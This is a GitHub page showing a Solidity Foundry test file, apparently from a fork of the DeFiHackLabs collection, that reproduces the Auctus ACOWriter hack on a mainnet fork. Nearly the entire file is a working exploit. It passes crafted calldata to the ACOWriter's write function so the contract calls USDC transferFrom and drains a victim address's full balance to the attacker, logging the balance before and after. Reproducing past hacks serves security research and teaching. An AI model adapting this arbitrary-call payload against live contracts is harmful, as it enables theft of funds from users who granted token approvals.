forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Auctus_exp.sol
57 lines (47 loc) · 1.83 KB
/
Auctus_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "./../interface.sol";
contract MockACOToken {
function collateral() public view returns (address) {
return address(0);
}
function mintToPayable(address account) external payable returns (uint256) {
return 1;
}
function balanceOf(address account) public view returns (uint256) {
return 1;
}
function approve(address spender, uint256 amount) public returns (bool) {
return true;
}
function strikeAsset() public view returns (address) {
return address(this);
}
function transfer(address recipient, uint256 amount) public returns (bool) {
return true;
}
}
contract ContractTest is Test, MockACOToken {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IACOWriter acowrite = IACOWriter(payable(0xE7597F774fD0a15A617894dc39d45A28B97AFa4f));
IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
function setUp() public {
cheats.createSelectFork("mainnet", 14_460_635); // fork mainnet at block 14460635
}
function test() public {
emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
acowrite.write{value: 1}(
address(this),
1,
address(usdc),
abi.encodeWithSelector(
bytes4(keccak256(bytes("transferFrom(address,address,uint256)"))),
0xCB32033c498b54818e58270F341e5f6a3bce993B,
msg.sender,
usdc.balanceOf(0xCB32033c498b54818e58270F341e5f6a3bce993B)
)
);
emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
}
}